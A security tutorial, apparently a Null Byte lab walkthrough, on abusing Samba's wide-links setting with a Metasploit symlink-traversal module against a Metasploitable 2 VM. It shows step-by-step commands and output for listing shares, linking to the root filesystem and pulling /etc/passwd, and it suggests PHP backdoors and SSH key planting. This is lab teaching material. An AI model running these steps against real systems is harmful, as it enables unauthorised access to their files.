Samba can be configured to allow any user with write access the ability to create a link to the root filesystem. Once an attacker has this level of access, it's only a matter of time before the system gets owned. Although this configuration isn't that common in the wild, it does happen, and Metasploit has a module to easily exploit this security flaw.
Symbolic links, or symlinks, are files that link to other files or directories on a system, and they are an essential part of the Linux environment. Symlinks are often used to connect libraries and redirect certain binaries to other versions.
File share systems, like Samba, can take advantage of symbolic links, allowing users to easily access linked folders and files. But these links are normally confined to within the share itself, making it impossible to access the underlying filesystem.
Samba does have an option to use wide links, which are basically symlinks that are allowed to link outside of the sandboxed file share. This is obviously a huge security hole, as any user with write access to a share can create a link to the root filesystem.
For this demonstration, we will be using Kali Linux to attack a Metasploitable 2 virtual machine. If you have a similar pentesting lab you can follow along.
Step 1: Create Link with Metasploit
The first thing we need to do after discovering that the SMB service is running on the target is to see if we can get access to the shares and, if so, find their names. We can use smbclient to do so:
~# smbclient -L //10.10.0.50/
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
Above, we can see that we are able to log in anonymously and list the shares. It looks like there are a couple of default shares, but the one that looks interesting is labeled tmp. It even has a comment that looks suspicious, so we'll use this as our target share.
Next, fire up Metasploit by typing msfconsole in the terminal.
~# msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 >
Once we're in and greeted by the login banner, we can search for a suitable module to use with the search command:
msf5 > search samba symlink
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
1 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
2 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
3 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
4 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules
5 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
6 auxiliary/server/wget_symlink_file_write 2014-10-27 normal No GNU Wget FTP Symlink Arbitrary Filesystem Access
7 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
8 exploit/linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation
9 exploit/linux/local/asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation
10 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
11 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
12 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
13 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
14 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
15 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
16 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
17 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
18 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
19 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
20 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
21 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
22 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
23 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
24 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
25 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
26 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
27 exploit/windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape
28 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
29 post/linux/gather/enum_configs normal No Linux Gather Configurations
We received a lot of results from that search term, but the one we want to use is actually the first one. Load the module with the use command, followed by the path of the module:
msf5 > use auxiliary/admin/smb/samba_symlink_traversal
Now that we are loaded into the context of the module, we can use the options command to see the settings:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > options
Module options (auxiliary/admin/smb/samba_symlink_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBSHARE yes The name of a writeable share on the server
SMBTARGET rootfs yes The name of the directory that should point to the root filesystem
It looks like it already has port 445 set as the correct port for SMB, as well as the name of the directory that will be created that links to the root filesystem. We need to set the RHOSTS option as the IP address of the target:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set rhosts 10.10.0.50
rhosts => 10.10.0.50
And the name of the share we want to write to, in this case, the tmp share:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set smbshare tmp
smbshare => tmp
Now we should be all set, and all we have to do is type run at the prompt to launch the module:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 10.10.0.50
[*] 10.10.0.50:445 - Connecting to the server...
[*] 10.10.0.50:445 - Trying to mount writeable share 'tmp'...
[*] 10.10.0.50:445 - Trying to link 'rootfs' to the root filesystem...
[*] 10.10.0.50:445 - Now access the following share to browse the root filesystem:
[*] 10.10.0.50:445 - \\10.10.0.50\tmp\rootfs\
[*] Auxiliary module execution completed
It spits out what it is doing as it runs — we can see it first connects to the server and mounts the writable share we specified. Then, it creates a link to the root filesystem and tells us where to go to access it. Perfect.
Step 2: Access Root Filesystem
Once the module does its thing, we can exit Metasploit with the exit command and connect to the target SMB share with smbclient:
msf5 > exit
~# smbclient //10.10.0.50/tmp
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
We can log in anonymously again and use the ls command to view the contents of the share:
smb: \> ls
. D 0 Wed Aug 8 10:52:28 2018
.. DR 0 Sun May 20 13:36:12 2012
4600.jsvc_up R 0 Wed Aug 8 08:57:48 2018
.ICE-unix DH 0 Wed Aug 8 08:56:05 2018
.X11-unix DH 0 Wed Aug 8 08:56:51 2018
.X0-lock HR 11 Wed Aug 8 08:56:51 2018
rootfs DR 0 Sun May 20 13:36:12 2012
7282168 blocks of size 1024. 5430648 blocks available
It looks like there's a new directory here, the one that was created with the Metasploit module. This is a link, and we can enter it just like a normal directory. Let's do that and see what's inside:
smb: \> cd rootfs\
smb: \rootfs\> ls
. DR 0 Sun May 20 13:36:12 2012
.. DR 0 Sun May 20 13:36:12 2012
initrd DR 0 Tue Mar 16 17:57:40 2010
media DR 0 Tue Mar 16 17:55:52 2010
bin DR 0 Sun May 13 22:35:33 2012
lost+found DR 0 Tue Mar 16 17:55:15 2010
mnt DR 0 Wed Apr 28 15:16:56 2010
sbin DR 0 Sun May 13 20:54:53 2012
initrd.img R 7929183 Sun May 13 22:35:56 2012
home DR 0 Fri Apr 16 01:16:02 2010
lib DR 0 Sun May 13 22:35:22 2012
usr DR 0 Tue Apr 27 23:06:37 2010
proc DR 0 Wed Aug 8 08:55:30 2018
root DR 0 Wed Aug 8 08:56:51 2018
sys DR 0 Wed Aug 8 08:55:31 2018
boot DR 0 Sun May 13 22:36:28 2012
nohup.out R 20962 Wed Aug 8 08:56:51 2018
etc DR 0 Wed Aug 8 08:56:23 2018
dev DR 0 Wed Aug 8 08:56:06 2018
vmlinuz R 1987288 Thu Apr 10 11:55:41 2008
opt DR 0 Tue Mar 16 17:57:39 2010
var DR 0 Wed Mar 17 09:08:23 2010
cdrom DR 0 Tue Mar 16 17:55:51 2010
tmp D 0 Wed Aug 8 10:52:28 2018
srv DR 0 Tue Mar 16 17:57:38 2010
7282168 blocks of size 1024. 5430648 blocks available
And there we have it — root filesystem access. We can now do things like view /etc/passwd, though we can't do that directly. Simply change into the /etc/ directory and use the get command to download the file to our machine:
smb: \rootfs\> cd etc
smb: \rootfs\etc\> get passwd
getting file \rootfs\etc\passwd of size 1581 as passwd (128.7 KiloBytes/sec) (average 128.7 KiloBytes/sec)
Now we can see all the users present on the target, their home directories, and the available shells — all useful info for reconnaissance:
~# cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
Further Attack Scenarios
Since we now have access to the root filesystem, there are several different paths an attacker can take. It all depends on the attacker's imagination and the configuration of the target.
There is one major caveat here: even though we have root access to the filesystem, we do not have root privileges. We only have the permissions associated with the anonymous login to the tmp share (usually normal user privileges). This limits what can be done, but depending on how the server is configured, there are a few things we could try.
For instance, since we have write access, we could place a PHP backdoor in the web root directory of Apache, and navigate to it in the browser to trigger a shell to our local machine. Another attack vector, if SSH config file permissions are lax, would be to add ourselves to the authorized keys file, allowing us to SSH into the box.
As a hacker, it is essential to be creative, and even in situations where escalating to shell access seems impossible, with enough patience and creativity, it can be done.
Wrapping Up
Today, we learned about wide links in Samba and how they can be abused to access the root filesystem. After verifying we could access an SMB share, we used a Metasploit module to create a link pointing to the root directory on the server. We could then view the root filesystem and explored a couple of possible attack vectors. The ability to leverage a simple misconfiguration to exploit the system should be the goal of any white-hat hacker.
Cover image by Pixabay/Pexels; Screenshots by drd_/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!